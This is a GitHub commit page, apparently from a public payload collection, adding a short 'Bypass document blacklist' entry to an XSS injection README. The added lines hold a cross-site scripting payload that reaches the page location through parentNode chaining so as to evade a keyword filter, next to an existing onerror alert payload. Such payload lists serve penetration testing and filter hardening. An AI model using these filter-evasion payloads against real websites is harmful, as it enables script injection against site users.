Skip to content

Commit

Permalink
XSS Payload - bypass document blacklisted keyword
Browse files Browse the repository at this point in the history
Swissky committed Mar 2, 2017
1 parent 0a0abd8 commit eecfc69
Showing 1 changed file with 4 additions and 0 deletions.
4 changes: 4 additions & 0 deletions XSS injection/README.md
Original file line number Diff line number Diff line change
@@ -422,6 +422,10 @@ Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
<img src='1' onerror='alert(0)' <
```

Bypass document blacklist
```
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
```

Bypass using javascript inside a string
```

0 comments on commit eecfc69

Please sign in to comment.